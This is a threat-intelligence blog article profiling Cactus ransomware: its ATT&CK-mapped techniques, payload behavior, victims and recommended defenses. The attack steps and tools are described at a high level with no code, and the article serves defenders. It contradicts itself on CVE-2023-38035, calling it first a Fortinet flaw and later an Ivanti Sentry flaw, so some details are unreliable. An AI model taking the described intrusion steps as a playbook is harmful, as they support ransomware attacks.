Table of Contents
Cactus ransomware, emerging around March 2023, has quickly become a significant threat in the cyber landscape. This ransomware strain employs double-extortion tactics, encrypting victims' data and threatening to leak it publicly if a ransom is not paid. Cactus is notable for its rapid exploitation of known vulnerabilities, particularly in VPN appliances and, more recently, in Qlik Sense software. This, combined with its use of sophisticated techniques to evade detection and achieve persistence, makes Cactus a formidable adversary for organizations of all sizes. The "digital kidnapping" of data and systems for financial gain is the core principle, and Cactus embodies this with its aggressive tactics.
Origins & Evolution
Cactus ransomware was first identified and tracked around March 2023. The name derives from the ransom note filename, "cAcTuS.readme.txt," and the file extension appended to encrypted files, ".cts[number]". While a relatively new entrant, Cactus has quickly targeted large commercial organizations, demonstrating a capacity for high-impact attacks.
While definitive attribution is challenging, Cactus shares some characteristics with other ransomware families. Some researchers have observed similarities in TTPs (Tactics, Techniques, and Procedures) with groups like BLACKBASTA, particularly in the use of the TotalExec.ps1 script for automated deployment. The Bitdefender report discusses potential early activity involving Kinsing, known for cryptojacking. The ransomware's encryption scheme, using a key to decrypt itself, suggests a level of sophistication to avoid anti-virus detection (Kroll). The usage of CVEs so soon after their release, also puts them in the same ballpark as other threat actors.
The evolution of Cactus is evident in its shifting initial access vectors. Initially, the exploitation of VPN vulnerabilities, specifically in Fortinet appliances (CVE-2023-38035), was a common entry point. More recently, Cactus operators have been observed exploiting vulnerabilities in Qlik Sense software (CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365), demonstrating an ability to adapt to new targets and exploit newly discovered weaknesses rapidly. The attack also expanded to include virtualization infrastructure (ESXi and Hyper-V).
Tactics & Techniques
Cactus ransomware employs a multi-stage attack chain, leveraging various techniques to infiltrate networks, establish persistence, exfiltrate data, and ultimately encrypt files. Here's a breakdown of key TTPs:
Initial Access (T1190 - Exploit Public-Facing Application): Cactus primarily gains initial access by exploiting vulnerabilities in public-facing applications. This has included Fortinet VPN vulnerabilities (CVE-2023-38035) and, more recently, Qlik Sense vulnerabilities (CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365).
Persistence (T1053 - Scheduled Task/Job): After gaining initial access, Cactus establishes persistence using various methods. A common tactic is creating an SSH backdoor for C2 server with scheduled tasks. The
Install.batscript is used for this purpose. It also uses scheduled tasks to execute itself from%ProgramData%with the-rargument.Reconnaissance (T1078.002 - Domain Accounts, T1087 - Account Discovery, T1049 - System Network Connections Discovery, T1018 - Remote System Discovery):
* Network scanning using tools like SoftPerfect Network Scanner and PSNmap tool (PSnmap.ps1) is used to gather IP addresses, enumerate endpoints, identify users, and check for active machines.
* Installs Remote Monitoring and Management (RMM) tools, such as AnyDesk and Splashtop, for persistent access and payload delivery. Learn about what are RMM tools.
Lateral Movement (T1570 - Lateral Tool Transfer, T1555.003 - Credentials from Web Browsers, T1003 - OS Credential Dumping):
* Cactus uses credential harvesting techniques, including LSASS credential dumping. Credentials are also dumped from web browsers and password files on disk.
* RDP (Remote Desktop Protocol) is used for lateral movement, leveraging valid or newly created accounts.
* Remote management tools, such as SuperOps RMM, are also utilized.
Command & Control (C2) (T1219 - Remote Access Software, T1090 - Proxy): Chisel (SOCKS5 proxy over SSH) is used in conjunction with Cobalt Strike for further C2 communication.
Defense Evasion (T1562.001 - Disable or Modify Tools, T1136 - Create Account, T1027 - Obfuscated Files or Information):
* Cactus attempts to disable or modify anti-virus software. This is often done via batch scripts and, in some cases, by using the anti-virus software's own uninstaller.
* f1.bat script is used to create a new administrator user account (e.g., Adm1nBac).
* The encryptor binary is packed (UPX) and requires a key to decrypt and execute, hindering analysis and detection. One way to look for any IOC is threat intelligence.
Exfiltration (T1567.002 - Exfiltration to Cloud Storage): RClone is used for data exfiltration to cloud storage services before encryption takes place.
Encryption & Impact (T1486 - Data Encrypted for Impact):
* Cactus executes TotalExec.ps1 remotely on discovered devices. This script, in turn, executes f1.bat, f2.bat, and the ransomware payload.
* The ransomware uses a combination of RSA and AES encryption (AES_CBC_256 + RSA_4096). For files larger than 7.7MB, partial encryption is employed.
* Encrypted files receive the extension ".cts[number]".
* Ransom notes, named "cAcTuS.readme.txt," are dropped in every processed folder.
Payload Analysis and Execution Flow
Arguments: The Cactus payload's execution flow changes based on arguments provided at launch. Initial execution typically uses the
-rargument.Mutex Creation: Creates a mutex with a unique Project ID (UID) to ensure only one instance runs if the
-rargument is present.Key Loading: Loads hardcoded hexadecimal data, converts it to a string, and decrypts the public key using an
AESKeyDecryptfunction.Copying and Persistence (-s argument): Creates the
C:\ProgramDatafolder, extracts the UID, and creates a self-copy within that folder. It also generatesntuser.dat, storing the ransomware file path and execution arguments. The Windows registry may contain useful forensic artifacts.Service Termination: Terminates specific services and processes, such as those related to SQL, backups, and security software.
Encryption: Encrypts files with RSA and AES (AES_CBC_256 + RSA_4096), excluding specific file extensions. Partial encryption is applied to large files.
Ransom Note: Creates randomly named ransom notes prefixed and postfixed with "C.A.c_T.U-S-R.e-a_D.m-e".
Targets or Victimology
Cactus ransomware primarily targets large commercial organizations. While potentially opportunistic, the group has demonstrated a willingness to target high-profile victims, including multinational corporations. This suggests a focus on targets with the potential for significant ransom payments and valuable data for extortion.
Industries targeted have included:
Technology: The compromise of Qlik Sense software indicates a focus on technology providers.
Manufacturing: Schneider Electric, a major player in energy management and automation, was a significant victim.
Supply Chain: Attacks on supply chain vendors (like Schneider Electric's Sustainability Business division and Blue Yonder) highlight a strategy to disrupt multiple organizations through a single point of compromise. Read about what is supply chain attack.
The geographical scope of Cactus attacks appears to be broad. Schneider Electric, a French company with global operations, was targeted, suggesting a willingness to operate internationally. The Bitdefender report details attacks on two companies, one being US-based and the other having a strong presence in Europe.
Cactus's double-extortion tactics indicate a primary motivation of financial gain. The threat of leaking stolen data, coupled with the encryption of critical systems, significantly increases the pressure on victims to pay the ransom.
Attack Campaigns
Several notable attack campaigns have been attributed to Cactus ransomware:
Schneider Electric (January 2024): This attack targeted the Sustainability Business division of Schneider Electric, a French multinational corporation. Cactus claimed to have stolen 1.5TB of data. The attack had potential supply chain implications, impacting clients of the Sustainability Business division.
Qlik Sense Exploitation (Late 2023): Darktrace observed Cactus operators exploiting Qlik Sense vulnerabilities before this attack vector was publicly reported. This highlights Cactus's ability to rapidly leverage newly discovered vulnerabilities.
Multi-Company Attack (Late 2023, detailed by Bitdefender): This coordinated attack targeted two companies, demonstrating Cactus's ability to conduct simultaneous operations. The attack involved exploiting CVE-2023-38035 (Ivanti MobileIron Sentry) and expanding to target virtualization infrastructure (ESXi and Hyper-V).
Blue Yonder (November 2024): A supply chain vendor. This breach caused operational disruptions for several prominent companies and led to the theft of sensitive data. There have been instances of ransomware attack on Blue Yonder.
Defenses
Combating Cactus ransomware requires a multi-layered approach, combining proactive prevention with robust detection and response capabilities. Key defense strategies include:
Vulnerability Management and Patching: Promptly patch known vulnerabilities, especially in internet-facing applications like VPNs and software like Qlik Sense. This is critical given Cactus's rapid exploitation of newly discovered vulnerabilities. Prioritize patching of internet-exposed servers. Having a good patch management strategy helps in this case.
Multi-Factor Authentication (MFA): Implement MFA on all critical systems, particularly VPNs and remote access services, to mitigate the risk of credential-based attacks.
Network Segmentation: Implement network segmentation to limit lateral movement. A zero-trust model can further enhance security.
Endpoint Detection and Response (EDR): Deploy EDR solutions capable of detecting malicious PowerShell scripts, credential dumping, unauthorized software installation, and other suspicious activities. Learn how to analyze a pcap file.
Privileged Access Management (PAM): Monitor and restrict privileged account usage. Enforce strong password policies and regularly review account permissions.
Backup and Recovery: Maintain offline backups and test restoration procedures regularly. This is essential for recovering from encryption, even if a ransom is paid.
Security Awareness Training: Educate users about phishing and other social engineering attacks. Train them to identify and report suspicious emails and attachments. One should be aware of types of phishing attacks.
Regular Security Audits: Conduct routine security audits and penetration testing to identify and remediate vulnerabilities.
Monitor for RMM Tools: Closely monitor the usage of remote management tools, as they are frequently abused by attackers.
Threat Intelligence: Leverage threat intelligence feeds to stay informed about emerging threats and IOCs related to Cactus and other ransomware groups.
Effective Logging: Enable and maintain robust security logging.
Collaboration and Information Sharing: Participate in threat intelligence sharing.
Autonomous Response: Consider implementing autonomous response capabilities to contain attacks in their early stages, before significant damage occurs. SOAR can help in automation.
Decoding Script: Utilize scripts like the one Kroll released to decode the ntuser.dat file.
Conclusion
Cactus ransomware represents a significant and evolving threat to organizations, particularly those with valuable data and critical infrastructure. Its rapid exploitation of vulnerabilities, sophisticated techniques, and double-extortion tactics make it a formidable adversary. By understanding Cactus's TTPs, targets, and attack campaigns, organizations can implement effective defenses to mitigate the risk of infection and minimize the impact of a successful attack. A proactive, multi-layered security approach, combining robust vulnerability management, strong access controls, advanced detection capabilities, and comprehensive incident response planning, is crucial for staying ahead of this and other emerging ransomware threats. Constant vigilance and adaptation are key in the ongoing battle against ransomware.
Found this article interesting? Keep visit thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive tips like this.
You may also like these articles:
Russian Hackers Launch Sophisticated Wi-Fi Attacks, Using Neighbors as a Covert Entry Point
Ransomware Payments Drop 35% in 2024 as Law Enforcement Disrupts Cybercrime
International Cybercrime Takedown: Four European Hackers Arrested in Phuket Ransomware Operation
AI-Driven Ransomware FunkSec Targets 85 Victims in December 2024
Ransomware Actors Exploit SSH Tunneling to Target VMware ESXi Hosts
Arun KL
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
- February 24, 2025
- February 24, 2025
- February 24, 2025
- February 22, 2025
Learn Something New with Free Email subscription
Learn Something New with Free Email subscription
Subscribe
Subscribe
Subscribe
Subscribe
- February 24, 2025
- February 24, 2025
- February 24, 2025
- February 22, 2025
